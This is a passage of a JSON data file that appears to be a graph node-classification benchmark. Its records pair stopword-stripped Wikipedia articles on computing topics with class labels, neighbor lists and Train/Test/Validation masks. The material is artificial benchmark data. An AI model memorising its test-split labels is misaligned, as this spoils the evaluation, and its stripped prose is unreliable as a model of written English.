    "text": "National_Health_Service_Central_Register_(Scotland):national health service central register scotland national health service central register nhscr scottish government database accessible public bodies approved scottish parliament register established early 1950s facilitate transfer patients health board areas across borders within countries united kingdom however role expanded decades also provides scottish local authorities unique citizen reference number ucrn used identify people databases 2006 scottish government national records scotland made major expansion applications nhscr changing regulations section 57 local electoral administration registration services scotland act 2006 2015 scottish government proposed expanding access nhscr 100 additional public bodies associated consultation received 302 responses proposed expansion criticised open rights group believed may breach data protection rules human rights resembles national identity system february 2017 scottish government informed scottish parliament intend proceed proposals community health index register patients nhs scotland scotland publicly funded healthcare system register exists ensure patients correctly identified information pertaining patient health available providers care patients identified using ten-digit number known chi number pronounced /ˈkaɪ/ number normally formed using patient date birth ddmmyy followed four digits two digits randomly generated third digit identifying gender odd men even women check digit modulus-11 march 2010 uptake number based radiology requests varied across scotland 96.5 99.9 depending local nhs board chi number included electronic medical referencing systems ams acute medicine service cms chronic medicine service mas minor ailment scheme connect scotland epharmacy contains details medical patients scotland",
    "neighbors": [
      9199
    ],
    "mask": "None"
  },
  {
    "node_id": 9484,
    "label": 4,
    "text": "FlyBack:flyback flyback open-source backup utility linux based git modeled loosely apple time machine flyback creates incremental backups files restored later date flyback presents chronological view file system allowing individual files directories previewed retrieved one time flyback originally based rsync project began 2007 october 2009 rewritten scratch using git flyback presents user typical file-manager style view file system additional controls allowing user go forward backward time shows user files exist exist changed since last version allows preview deciding restore ignore flyback settings preferences flyback ui allows users flyback written python using gtk libraries well program git installed software function properly",
    "neighbors": [
      9025,
      3366,
      6280,
      1801,
      5482,
      8554,
      1358,
      7983,
      823,
      11256
    ],
    "mask": "Test"
  },
  {
    "node_id": 9485,
    "label": 4,
    "text": "TCP_Gender_Changer:tcp gender changer tcp gender changer method computer networking making internal tcp/ip based network server accessible beyond protective firewall consists two nodes one resides internal local area network access desired server node runs outside local area network client access nodes respectively called cc connect-connect listen-listen reason behind naming nodes fact connect-connect node initiates two connections one listen-listen node one actual server listen-listen node however passively listens two tcp/ip ports one receive connection cc one incoming connection client cc node runs inside network establish control connection waiting signal open connection internal server upon receiving client connection signal cc node connect server done cc let know result successful keep client connection thus client server communicate cc relay data back forth one cases useful connect desktop machine behind firewall running vnc would make desktop remotely accessible network beyond firewall another useful scenario would create vpn using ppp ssh even simply using ssh connect internal unix based server",
    "neighbors": [
      10341,
      8998,
      939,
      8432,
      5492,
      5749
    ],
    "mask": "Train"
  },
  {
    "node_id": 9486,
    "label": 4,
    "text": "Out_of_the_Inner_Circle:inner circle inner circle hacker guide computer security book bill landreth howard rheingold published 1985 microsoft press distributed simon schuster inc. book created provide insight ways methods hacking community days internet became prevalent although largely outdated nostalgic show brought many current trends see network security today",
    "neighbors": [
      4435,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 9487,
    "label": 2,
    "text": "MacPorts:macports macports formerly called darwinports package management system simplifies installation software macos darwin operating systems open-source software project simplify installation open source software similar aim function fink bsd ports collections darwinports started 2002 part opendarwin project involvement number apple inc. employees including landon fuller kevin van vechten jordan hubbard macports allows installation number packages entering command sudo port install packagename terminal download compile necessary install requested software also installing required dependencies automatically installed packages updated command sudo port upgrade outdated official gui application called pallet also available version 1.0 released april 28 2005 december 2005 project reached milestone surpassing 3000 ports time package installation involved source code downloaded compiled end user machine version 2.0 released 2011 introduced support prebuilt binary archives default ports installed using prebuilt binary archive available built source otherwise macports 21,600 ports macports hosted mac os forge open source hosting service created maintained apple inc. third-party projects supported apple apple closed mac os forge 2016 project moved github best-effort support sourced community macports supports universal binaries powerpc intel-based versions mac os x migrating powerpc installation macports version intel mac requires reinstalling installed ports",
    "neighbors": [
      10760,
      8213,
      6680,
      9245,
      5155,
      5670,
      7722,
      5677,
      8754,
      9784,
      10817,
      8778,
      3667,
      6227,
      2149,
      9324,
      1138,
      2168,
      7293,
      9342,
      6797,
      10900,
      10394,
      4775,
      6828,
      3248,
      692,
      1718,
      5819,
      190,
      708,
      4302,
      2259,
      3286,
      6361,
      8413,
      741,
      231,
      2281,
      5356,
      8441,
      6393,
      5380,
      11525,
      7435,
      7947,
      4369,
      788,
      1813,
      5397,
      8476,
      811,
      6446,
      7983,
      1842,
      823,
      2872,
      2363,
      3393,
      3918,
      4951,
      348,
      9564,
      2401,
      1379,
      9063,
      8554,
      10096,
      8068,
      3462,
      8582,
      2955,
      6583,
      10172,
      9151,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      2010,
      7140,
      5093,
      6119,
      5096,
      5612,
      1522,
      5619,
      3573,
      11257,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9488,
    "label": 4,
    "text": "Computer_security_software:computer security software computer security software cybersecurity software computer program designed enhance information security defense computers intrusion unauthorized use resources called computer security similarly",
    "neighbors": [
      5636,
      6149,
      10756,
      531,
      2601,
      6699,
      3629,
      8753,
      569,
      7739,
      9791,
      8784,
      107,
      2678,
      8313,
      5245,
      5246,
      127,
      10880,
      7809,
      9356,
      10385,
      10392,
      156,
      5282,
      2213,
      5799,
      7855,
      2737,
      5305,
      10940,
      3262,
      704,
      7362,
      7368,
      1242,
      6373,
      4860,
      5373,
      1279,
      2309,
      5384,
      8978,
      8980,
      4889,
      4892,
      5404,
      5411,
      1318,
      8998,
      3880,
      297,
      2859,
      8493,
      5433,
      9537,
      9031,
      11081,
      4435,
      2907,
      7515,
      9055,
      9569,
      3941,
      4972,
      3473,
      3484,
      2975,
      2976,
      939,
      9646,
      1970,
      10166,
      4033,
      3525,
      9160,
      9688,
      11225,
      8668,
      11244,
      2041,
      2554,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9489,
    "label": 3,
    "text": "Maxwell_(microarchitecture):maxwell microarchitecture maxwell codename gpu microarchitecture developed nvidia successor kepler microarchitecture maxwell architecture introduced later models geforce 700 series also used geforce 800m series geforce 900 series quadro mxxx series manufactured tsmc 28 nm process first maxwell-based products hit market geforce gtx 750 geforce gtx 750 ti released february 18 2014 chip code number gm107 earlier geforce 700 series gpus used kepler chips code numbers g k 1xx gm10x gpus also used geforce 800m series quadro kxxx series second generation maxwell-based products introduced september 18 2014 geforce gtx 970 geforce gtx 980 followed geforce gtx 960 january 22 2015 geforce gtx titan x march 17 2015 geforce gtx 980 ti june 1 2015 gpus gm 2 0x chip code numbers maxwell introduced improved streaming multiprocessor sm design increased power efficiency sixth seventh generation purevideo hd cuda compute capability 5.2 architecture named james clerk maxwell founder theory electromagnetic radiation maxwell architecture used system chip soc mobile application processor tegra x1 successor maxwell codenamed pascal pascal architecture features high bandwidth memory unified memory nvlink first generation maxwell gpus gm107/gm108 released geforce gtx 745 gtx 750/750 ti gtx 850m/860m gm107 geforce 830m/840m gm108 new chips introduced consumer-facing additional features nvidia instead focused increasing gpu power efficiency l2 cache increased 256 kib kepler 2 mib maxwell reducing need memory bandwidth accordingly memory bus reduced 192 bit kepler gk106 128 bit reducing die area power draw streaming multiprocessor design kepler also retooled partitioned renamed smm maxwell structure warp scheduler inherited kepler texture units fp64 cuda cores still shared layout execution units partitioned warp schedulers smm controls one set 32 fp32 cuda cores one set 8 load/store units one set 8 special function units contrast kepler smx 4 schedulers schedule shared pool execution units prior kepler units connected crossbar uses unnecessary power allow shared maxwell crossbar removed became redundant allowed finer-grained efficient allocation resources kepler saving power workload n't optimal shared resources nvidia claims 128 cuda core smm 90 performance 192 cuda core smx efficiency increases factor 2 also graphics processing cluster gpc contains 4 smx units kepler 5 smm units first generation maxwell gm107 also supports cuda compute capability 5.0 compared 3.5 gk110/gk208 gpus 3.0 gk10x gpus dynamic parallelism hyperq two features gk110/gk208 gpus also supported across entire maxwell product line maxwell also provides native shared memory atomic operations 32-bit integers native shared memory 32-bit 64-bit compare-and-swap cas used implement atomic functions nvidia video encoder nvenc upgraded 1.5 2 times faster kepler-based gpus meaning encode video six eight times playback speed nvidia also claims eight ten times performance increase purevideo feature set e video decoding due video decoder cache paired increases memory efficiency however h.265 supported full hardware decoding first generation maxwell gpus relying mix hardware software decoding decoding video new low power state gc5 used maxwell gpus conserve power maxwell gpus found use tiled rendering second generation maxwell gpus introduced several new technologies dynamic super resolution third generation delta color compression multi-pixel programming sampling nvidia vxgi real-time-voxel-global illumination vr direct multi-projection acceleration multi-frame sampled anti-aliasing mfaa however support coverage-sampling anti-aliasing csaa removed direct3d12 api feature level 12_1 hdmi 2.0 support also added rop memory controller ratio changed 8:1 16:1 however rops generally idle gtx 970 enough enabled smms give work reducing maximum fill rate polymorph engine responsible tessellation upgraded version 3.0 second generation maxwell gpus resulting improved tessellation performance per unit/clock second generation maxwell also 4 smm units per gpc compared 5 smm units per gpc gm204 supports cuda compute capability 5.2 compared 5.0 gm107/gm108 gpus 3.5 gk110/gk208 gpus 3.0 gk10x gpus gm20x gpus upgraded nvenc supports hevc encoding adds support h.264 encoding resolutions 1440p/60fps 4k/60fps compared nvenc maxwell first generation gm10x gpus supported h.264 1080p/60fps encoding consumer complaints nvidia revealed able disable individual units containing 256kb l2 cache 8 rops without disabling whole memory controllers comes cost dividing memory bus high speed low speed segments accessed time reads l2/rop unit managing gddr5 controllers shares read return channel write data bus gddr5 controllers makes simultaneous reading gddr5 controllers simultaneous writing gddr5 controllers impossible used geforce gtx 970 therefore described 3.5 gb high-speed segment 224-bit bus 512 mb low-speed segment 32-bit bus peak speed gpu still attained peak speed figure reachable one segment executing read operation segment executing write operation theoretical single-precision processing power maxwell gpu flops computed 2 operations per fma instruction per cuda core per cycle × number cuda cores × core clock speed hz theoretical double-precision processing power maxwell gpu 1/32 single precision performance noted low compared previous generation kepler successor maxwell codenamed pascal pascal architecture features high bandwidth memory unified memory nvlink",
    "neighbors": [
      3585,
      3203,
      398,
      10658,
      2339,
      7086,
      9774,
      9911,
      11322,
      8514,
      7111,
      2635,
      10971,
      2525,
      2277,
      8937,
      11630,
      1776,
      6900,
      2937,
      11130
    ],
    "mask": "Test"
  },
  {
    "node_id": 9490,
    "label": 2,
    "text": "Reference_counting:reference counting computer science reference counting programming technique storing number references pointers handles resource object block memory disk space others garbage collection algorithms reference counts may used deallocate objects longer needed main advantage reference counting tracing garbage collection objects reclaimed soon longer referenced incremental fashion without long pauses collection cycles clearly defined lifetime every object real-time applications systems limited memory important maintain responsiveness reference counting also among simplest forms memory management implement also allows effective management non-memory resources operating system objects often much scarcer memory tracing garbage collection systems use finalizers delayed reclamation may cause problems weighted reference counts good solution garbage collecting distributed system tracing garbage collection cycles triggered often set live objects fills available memory requires extra space efficient reference counting performance deteriorate total amount free space decreases reference counts also useful information use input runtime optimizations example systems depend heavily immutable objects many functional programming languages suffer efficiency penalty due frequent copies however compiler runtime system knows particular object one reference many systems reference lost time similar new object created string append statement codice_1 replace operation mutation original object reference counting naive form two main disadvantages tracing garbage collection require additional mechanisms ameliorate addition memory allocated free list reference counting suffers poor locality reference counting alone move objects improve cache performance high performance collectors implement tracing garbage collector well implementations ones php objective-c suffer poor cache performance since implement copying objects dealing garbage collection schemes often helpful think reference graph directed graph vertices objects edge object object b holds reference b also special vertex vertices representing local variables references held runtime system edges ever go nodes although edges go nodes context simple reference count object in-degree vertex deleting vertex like collecting object done vertex incoming edges affect out-degree vertices affect in-degree vertices causing corresponding objects collected well in-degree also becomes 0 result connected component containing special vertex contains objects ca n't collected connected components graph contain garbage reference-counting garbage collection algorithm implemented garbage components must contain least one cycle otherwise would collected soon reference count i.e. number incoming edges dropped zero incrementing decrementing reference counts every time reference created destroyed significantly impede performance operations take time damage cache performance lead pipeline bubbles even read-only operations like calculating length list require large number reads writes reference updates naive reference counting one simple technique compiler combine number nearby reference updates one especially effective references created quickly destroyed care must taken however put combined update right position premature free avoided deutsch-bobrow method reference counting capitalizes fact reference count updates fact generated references stored local variables ignores references counting references data structures object reference count zero deleted system must verify scan stack registers reference still exists another technique devised henry baker involves deferred increments references stored local variables immediately increment corresponding reference count instead defer necessary reference destroyed quickly need update counter eliminates large number updates associated short-lived references list-length-counting example however reference copied data structure deferred increment must performed time also critical perform deferred increment object count drops zero resulting premature free dramatic decrease overhead counter updates obtained levanoni petrank introduce update coalescing method coalesces many redundant reference count updates consider pointer given interval execution updated several times first points object codice_2 object codice_3 forth end interval points object codice_4 reference counting algorithm would typically execute codice_5 codice_6 codice_7 codice_8 codice_9 ... codice_10 updates redundant order reference count properly evaluated end interval enough perform codice_5 codice_10 rest updates redundant levanoni petrank showed 2001 use update coalescing reference counting collector using update coalescing appropriate treatment new objects 99 counter updates eliminated typical java benchmarks addition need atomic operations pointer updates parallel processors eliminated finally presented enhanced algorithm may run concurrently multithreaded applications employing fine synchronization blackburn mckinley ulterior reference counting method 2003 combines deferred reference counting copying nursery observing majority pointer mutations occur young objects algorithm achieves throughput comparable fastest generational copying collectors low bounded pause times reference counting perhaps obvious way handle reference cycles design system avoid creating system may explicitly forbid reference cycles file systems hard links often judicious use weak non-counted references may also help avoid retain cycles cocoa framework instance recommends using strong references parent-to-child relationships weak references child-to-parent relationships systems may also designed tolerate correct cycles create way developers may design code explicitly tear references data structure longer needed though cost requiring manually track data structure lifetime technique automated creating owner object tearing-down destroyed instance graph object destructor could delete edges graphnodes breaking reference cycles graph cycles may even ignored systems short lives small amount cyclic garbage particularly system developed using methodology avoiding cyclic data structures wherever possible typically expense efficiency computer scientists also discovered ways detect collect reference cycles automatically without requiring changes data structure design one simple solution periodically use tracing garbage collector reclaim cycles since cycles typically constitute relatively small amount reclaimed space collector run much less often ordinary tracing garbage collector bacon describes cycle-collection algorithm reference counting similarities tracing collectors including theoretical time bounds based observation cycle isolated reference count decremented nonzero value objects occurs put roots list periodically program searches objects reachable roots cycles knows found cycle collected decrementing reference counts cycle references brings zero enhanced version algorithm paz et al able run concurrently operations improve efficiency using update coalescing method levanoni petrank although possible augment simple reference counts variety ways often better solution found performing reference counting fundamentally different way describe variants reference counting benefits drawbacks weighted reference counting reference assigned weight object tracks number references referring total weight references referring initial reference newly created object large weight 2 whenever reference copied half weight goes new reference half weight stays old reference since total weight change object reference count need updated destroying reference decrements total weight weight reference total weight becomes zero references destroyed attempt made copy reference weight 1 reference get weight adding total weight adding new weight reference splitting alternative situation create indirection reference object initial reference created large weight split property needing access reference count reference copied particularly helpful object reference count expensive access example another process disk even across network also help increase concurrency avoiding many threads locking reference count increase thus weighted reference counting useful parallel multiprocess database distributed applications primary problem simple weighted reference counting destroying reference still requires accessing reference count many references destroyed cause bottlenecks seek avoid adaptations weighted reference counting seek avoid attempting give weight back dying reference one still active weighted reference counting independently devised bevan watson watson 1987 indirect reference counting necessary keep track reference obtained means two references kept object direct one used invocations indirect one forms part diffusion tree dijkstra-scholten algorithm allows garbage collector identify dead objects approach prevents object discarded prematurely collection algorithm reference counting tracks object count number references held objects object reference count reaches zero object become inaccessible destroyed object destroyed objects referenced object also reference counts decreased removing single reference potentially lead large number objects freed common modification allows reference counting made incremental instead destroying object soon reference count becomes zero added list unreferenced objects periodically needed one items list destroyed simple reference counts require frequent updates whenever reference destroyed overwritten reference count object references decremented whenever one created copied reference count object references incremented reference counting also used file systems distributed systems full non-incremental tracing garbage collection time consuming size object graph slow access speed microsoft component object model com winrt makes pervasive use reference counting fact two three methods com objects must provide iunknown interface increment decrement reference count much windows shell many windows applications including ms internet explorer ms office countless third-party products built com demonstrating viability reference counting large-scale systems one primary motivation reference counting com enable interoperability across different programming languages runtime systems client need know invoke object methods order manage object life cycle thus client completely abstracted whatever memory allocator implementation com object uses typical example visual basic program using com object agnostic towards whether object allocated must later deallocated c++ allocator another visual basic component c++ perform reference-counting default fulfilling philosophy adding functionality might incur overheads user explicitly requested objects shared owned accessed via reference raw pointer iterator conceptual generalisation pointers however token c++ provides native ways users opt-into functionality c++11 provides reference counted smart pointers via class enabling automatic shared memory-management dynamically allocated objects programmers use conjunction weak pointers via break cyclic dependencies objects dynamically allocated intended shared lifetime automatically managed using addition c++11 move semantics reduce extent reference counts need modified removing deep copy normally used function returns object allows simple copy pointer said object apple cocoa cocoa touch frameworks related frameworks core foundation use manual reference counting much like com traditionally accomplished programmer manually sending codice_13 codice_14 messages objects automatic reference counting clang compiler feature automatically inserts messages needed added ios 5 mac os x 10.7 mac os x 10.5 introduced tracing garbage collector alternative reference counting deprecated os x 10.8 removed objective-c runtime library macos sierra ios never supported tracing garbage collector one language uses reference counting garbage collection delphi delphi mostly garbage collected language user-defined types must still manually allocated deallocated provide automatic collection however built-in types strings dynamic arrays interfaces ease use simplify generic database functionality programmer decide whether use built-in types delphi programmers complete access low-level memory management like c/c++ potential cost delphi reference counting desired easily circumvented reasons reference counting may preferred forms garbage collection delphi include gobject object-oriented programming framework implements reference counting base types including weak references reference incrementing decrementing uses atomic operations thread safety significant amount work writing bindings gobject high-level languages lies adapting gobject reference counting work language memory management system vala programming language uses gobject reference counting primary garbage collection system along copy-heavy string handling perl also uses reference counting without special handling circular references although cocoa c++ perl support weak references allows programmers avoid creating cycle php uses reference counting mechanism internal variable management since php 5.3 implements algorithm bacon mentioned paper php allows turn cycle collection user-level functions also allows manually force purging mechanism run python also uses reference counting offers cycle detection well reclaim squirrel also uses reference counting offers cycle detection well tiny language relatively unknown outside video game industry however concrete example reference counting practical efficient especially realtime environments tcl 8 uses reference counting memory management values tcl obj structs since tcl values immutable reference cycles impossible form cycle detection scheme needed operations would replace value modified copy generally optimized instead modify original reference count indicates unshared references counted data structure level problems frequent updates discussed arise xojo also uses reference counting without special handling circular references although cocoa c++ xojo support weak references allows programmers avoid creating cycle many file systems maintain count number references particular block file example inode link count unix-style file systems references usually called hard links count falls zero file safely deallocated addition references still made directories unixes allow referencing solely made live processes files exist file system hierarchy",
    "neighbors": [
      2304,
      3076,
      8582,
      4747,
      8587,
      2832,
      5008,
      9490,
      11539,
      11674,
      7580,
      541,
      3102,
      3871,
      1954,
      5154,
      4777,
      814,
      1715,
      692,
      1844,
      7219,
      8631,
      3512,
      11317,
      10044,
      2625,
      1474,
      8644,
      7237,
      8772,
      1736,
      4424,
      6730,
      716,
      6221,
      3790,
      847,
      5840,
      7292,
      338,
      5074,
      6868,
      3413,
      86,
      6871,
      5080,
      7889,
      7894,
      1247,
      8545,
      2146,
      10470,
      2152,
      8041,
      8298,
      7403,
      8554,
      10734,
      8303,
      2673,
      10739,
      5365,
      634,
      380,
      8573,
      7039
    ],
    "mask": "None"
  },
  {
    "node_id": 9491,
    "label": 2,
    "text": "Windows_Template_Library:windows template library windows template library wtl free software object-oriented c++ template library win32 development wtl created microsoft employee nenad stefanovic internal use later released unsupported add-on visual studio win32 framework sdk developed primarily light-weight alternative microsoft foundation classes builds upon microsoft atl another lightweight api widely used create com activex libraries wtl provides support implementing various user interface elements frame popup windows mdi standard common controls common dialogs property sheets pages gdi objects common ui elements scrollable windows splitter windows toolbars command bars wtl main objective deliver small efficient code close size speed straight sdk programs providing higher-level flexible object model developers classes string wrapper syntax-compatible mfc codice_1 templated collections also included wtl api mirror standard win32 calls interface tends familiar windows programmers although official documentation microsoft exists wtl documentation project attempting create comprehensive reference library wtl supported microsoft product support services wtl template library therefore code-based original license similar one used microsoft foundation class library mfc source code although contained usage distribution restrictions 2004 microsoft made complete source code available common public license released sourceforge since version 9.1 library licensed microsoft public license",
    "neighbors": [
      10243,
      2062,
      9234,
      1043,
      9245,
      1055,
      2083,
      8227,
      1577,
      2603,
      5165,
      5677,
      3631,
      4143,
      9263,
      8246,
      576,
      8771,
      4178,
      9813,
      10841,
      603,
      2658,
      5743,
      8303,
      2673,
      8304,
      1656,
      9848,
      5754,
      7292,
      9340,
      1664,
      5761,
      1666,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3734,
      3224,
      4771,
      7846,
      4777,
      10414,
      11442,
      692,
      214,
      4822,
      9943,
      9434,
      736,
      4321,
      6370,
      4836,
      10470,
      1770,
      11498,
      3821,
      10991,
      10480,
      2804,
      6927,
      1812,
      5401,
      5913,
      11546,
      4384,
      3876,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1347,
      1348,
      844,
      8524,
      10079,
      11616,
      8554,
      9579,
      5492,
      2943,
      3462,
      8582,
      9609,
      10654,
      8607,
      9128,
      8618,
      6584,
      2493,
      8644,
      4550,
      7629,
      479,
      8161,
      6114,
      5612,
      9196,
      4590,
      11247,
      3573,
      10229,
      2045,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 9492,
    "label": 9,
    "text": "Robert_S._Boyer:robert s. boyer robert stephen boyer retired professor computer science mathematics philosophy university texas austin j strother moore invented boyer–moore string search algorithm particularly efficient string searching algorithm 1977 moore also collaborated boyer–moore automated theorem prover nqthm 1992 following worked moore matt kaufmann another theorem prover called acl2 boyer published extensively including following books",
    "neighbors": [
      11488,
      4612,
      5064,
      11083,
      4916,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 9493,
    "label": 7,
    "text": "Veniam:veniam veniam technology startup intelligent networking platform moves massive amounts data connected vehicles cloud veniam unique mobile-data platform built future based autonomous vehicles avs emerging “ internet moving things ” brings three essential enablers vision truly smart cities multinetwork mesh networking local data management low-latency company headquartered mountain view california founded 2012 company received 4.9 million dollars 2014 funding round true ventures usv cane investments veniam technology used porto city buses 230,000 users onboard units obus installed 600 buses taxis garbage trucks aim equip many moving things wireless hotspots creating mesh could used build sensors turn city smarter.each vehicle equipped netrider multi network unit wi-fi 802.11p dsrc gps 4g/lte connectivity veniam founded joão barros ceo roy russell former zipcar cto susana sargento professor university aveiro robin chase former ceo zipcar buzzcar veniam platform",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 9494,
    "label": 9,
    "text": "Action_description_language:action description language artificial intelligence action description language adl automated planning scheduling system particular robots considered advancement strips edwin pednault specialist field data abstraction modelling ibm research staff member data abstraction research group since 1996 proposed language 1987 example action language pednault observed expressive power strips susceptible improved allowing effects operator conditional main idea adl-a basically propositional fragment adl proposed pednault adl-b extension -a -b extension actions described indirect effects introduction new kind propositions ” static laws third variation adl adl-c similar -b sense propositions classified static dynamic laws particularities sense planning language represent certain conditions environment based automatically generate chain actions lead desired goal goal certain partially specified condition action executed preconditions must fulfilled execution action yields effects environment changes environment described means certain predicates either fulfilled contrary strips principle open world applies adl everything occurring conditions unknown instead assumed false addition whereas strips positive literals conjunctions permitted adl allows negative literals disjunctions well adl schema consists action name optional parameter list four optional groups clauses labeled precond add delete update precond group list formulae define preconditions execution action set empty value true inserted group preconditions always evaluated holding conditions add delete conditions specified add delete groups respectively group consists set clauses forms shown left-hand column figure 1 update groups used specify update conditions change values function symbols update group consists set clauses forms shown left column figure 2 formal semantic adl defined 4 constraints first constraint actions may change set objects exist world means every action α every current-state/next-state pair ∈ must case domain equal domain second constraint actions adl must deterministic current-state/next-state pairs action ∃ must case third constraint incorporated adl functions introduced must representable first-order formulas every n -ary relation symbol r must exist formula φ x ... x free variables x ... x f given consequently f n ... x true performing action |= φ x ... x true beforehand note representability requirement relies first constraint domain f equal domain fourth final constraint incorporated adl set states action executable must also representable formula every action α represented adl must exist formula π property |= π state ∈ α i.e action α executable state terms computational efficiency adl located strips situation calculus adl problem translated strips instance – however existing compilation techniques worst-case exponential worst case improved willing preserve length plans polynomially thus adl strictly brief strips adl planning still pspace-complete problem algorithms polynomial space even preconditions effects complex formulae top-performing approaches classical planning internally utilize strips like representation fact planners ff lpg fast-downward sgplan5 lama first translate adl instance one essentially strips one without conditional quantified effects goals expressiveness strips language constrained types transformations sets formulas described language transformations sets formulas using strips operators accomplished removing formulas set transformed adding new additional formulas given strips operator formulas added deleted fixed sets formulas transformed consequently strips operators adequately model actions whose effects depend situations performed consider rocket going fired certain amount time trajectory may vary burn duration also velocity mass orientation rocket modelled means strips operator formulas would added deleted would depend set formulas transformed although efficient reasoning possible strips language used generally recognized expressiveness strips suitable modeling actions many real world applications inadequacy motivated development adl language adl expressiveness complexity lies strips language situation calculus expressive power sufficient allow rocket example described represented yet time restrictive enough allow efficient reasoning algorithms developed example complex version blocks world could block twice big blocks b c action xmoveonto b might effect negating clear c already true creating conditional effect depending size blocks kind conditional effects would hard express strips notation without conditional effects consider problem air freight transport certain goods must transported airport another airport plane airplanes need loaded unloaded necessary actions would loading unloading flying descriptors one could express whether freight c airplane p whether object x airport actions could defined follows",
    "neighbors": [
      10042
    ],
    "mask": "Test"
  },
  {
    "node_id": 9495,
    "label": 7,
    "text": "DesktopTwo:desktoptwo desktoptwo free webtop whose url desktoptwo.com parked domain developed sapotek whose url sapotek.com also parked domain also called webos although sapotek stated website term premature presumptuous mimics look feel functionality desktop environment operating system software reached beta stage spanish version called computadora.de desktoptwo web-based required adobe flash player operate web applications found desktoptwo built php back end features included drag-and-drop functionality sapotek liberated web applications found desktoptwo sapodesk agpl license desktoptwo belonged category services intended turn web full-fledged platform using web services foundation along presentation technologies replicated experience desktop applications users cloud os functionality server granularized abstracted web services web developers used create composite applications similar desktop software developers use several apis os create applications sites like facebook attempt create similar effect exposing apis allowing developers create applications upon features found desktoptwo file sharing webmail blog creator instant messenger address book calendar rss reader office productivity applications desktoptwo.com since closed longer running goes sapotek website sapotek since gone public market closed doors",
    "neighbors": [
      3833,
      8644,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9496,
    "label": 4,
    "text": "MoBlock:moblock moblock free software blocking connections specified range hosts moblock ip address filtering program linux similar peerguardian microsoft windows development stopped favor phoenix labs official peerguardian linux parts code merged peerguardian linux",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      1163,
      6797,
      1172,
      3482,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5860,
      3942,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 9497,
    "label": 9,
    "text": "Referential_transparency:referential transparency referential transparency referential opacity properties parts computer programs expression called referentially transparent replaced corresponding value without changing program behavior requires expression pure say expression value must inputs evaluation must side effects expression referentially transparent called referentially opaque mathematics function applications referentially transparent definition constitutes mathematical function however always case programming terms procedure method used avoid misleading connotations functional programming referentially transparent functions considered programming languages provide means guarantee referential transparency functional programming languages enforce referential transparency functions importance referential transparency allows programmer compiler reason program behavior rewrite system help proving correctness simplifying algorithm assisting modifying code without breaking optimizing code means memoization common subexpression elimination lazy evaluation parallelization concept seems originated alfred north whitehead bertrand russell principia mathematica 1910–13 adopted analytical philosophy willard van orman quine §30 word object 1960 quine gives definition mode containment φ referentially transparent whenever occurrence singular term purely referential term sentence ψ purely referential also containing term sentence φ ψ term appeared contemporary usage discussion variables programming languages christopher strachey seminal set lecture notes fundamental concepts programming languages 1967 lecture notes referenced quine word object bibliography functions involved expression pure functions expression referentially transparent consider function returns input source pseudocode call function might codice_1 codice_2 might identify particular disk file keyboard etc even identical values codice_2 successive return values different therefore function codice_4 neither deterministic referentially transparent subtle example function free variable i.e. depends input explicitly passed parameter resolved according name binding rules non-local variable global variable variable current execution environment dynamic binding variable closure static binding since variable altered without changing values passed parameter results subsequent calls function may differ even parameters identical however pure functional programming destructive assignment allowed thus free variable statically bound value function still referentially transparent neither non-local variable value change due static binding immutability respectively arithmetic operations referentially transparent codice_5 replaced codice_6 instance fact functions mathematical sense referentially transparent codice_7 transparent since always give result particular codice_8 assignments transparent instance c expression codice_9 changes value assigned variable codice_8 assuming codice_8 initially value codice_12 two consecutive evaluations expression yield respectively codice_13 codice_14 clearly replacing codice_9 either codice_13 codice_14 gives program different meaning expression referentially transparent however calling function codice_18 transparent implicitly change input x thus side effects codice_19 transparent evaluate replace value say jan 1 2001 n't get result run tomorrow depends state date languages side-effects like haskell substitute equals equals codice_20 every value x hold languages side-effects substitution expression value valid certain point execution program expression referentially transparent definition ordering sequence points theoretical foundation imperative programming part semantics imperative programming language however referentially transparent expression evaluated time necessary define sequence points guarantee order evaluation programming done without considerations called purely functional programming one advantage writing code referentially transparent style given intelligent compiler static code analysis easier better code-improving transformations possible automatically example programming c performance penalty including call expensive function inside loop even function call could moved outside loop without changing results program programmer would forced perform manual code motion call possibly expense source code readability however compiler able determine function call referentially transparent perform transformation automatically primary disadvantage languages enforce referential transparency make expression operations naturally fit sequence-of-steps imperative programming style awkward less concise languages often incorporate mechanisms make tasks easier retaining purely functional quality language definite clause grammars monads example let use two functions one referentially opaque referentially transparent function codice_21 referentially transparent means codice_22 codice_23 instance codice_24 however ca n't say thing codice_25 uses global variable modifies referential opacity codice_25 makes reasoning programs difficult example say wish reason following statement one may tempted simplify statement however work codice_27 occurrence codice_28 evaluates different value remember return value codice_25 based global value n't passed gets modified call codice_25 means mathematical identities formula_1 longer hold mathematical identities hold referentially transparent functions codice_21 however sophisticated analysis used simplify statement takes steps requires degree insight code infeasible compiler optimization therefore referential transparency allows us reason code lead robust programs possibility finding bugs could n't hope find testing possibility seeing opportunities optimization",
    "neighbors": [
      1152,
      2817,
      1952,
      11361,
      3876,
      8262,
      6536,
      7627,
      10571,
      655,
      5456,
      10011,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9498,
    "label": 2,
